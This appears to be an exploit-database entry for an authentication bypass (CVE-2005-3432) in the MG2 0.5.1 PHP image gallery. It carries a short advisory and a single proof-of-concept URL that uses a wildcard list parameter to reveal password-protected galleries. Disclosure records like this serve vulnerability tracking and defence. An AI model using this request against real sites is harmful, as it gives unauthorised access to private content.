[] NeoSense

MG2 0.5.1 - Authentication Bypass

Author: Preben Nylokken
type: webapps
platform: php
port: 
date_added: 2005-10-29 
date_updated: 2013-06-25 
verified: 1 
codes: CVE-2005-3432;OSVDB-20385 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/15235/info

MG2 is affected by an authentication bypass vulnerability. This issue can allow remote attackers to gain access to password protected image galleries.

All versions of MG2 are considered to be vulnerable at the moment. Minigal B13 is likely affected as well.

http://www.exmaple.com/mg2/index.php?list=*&page=all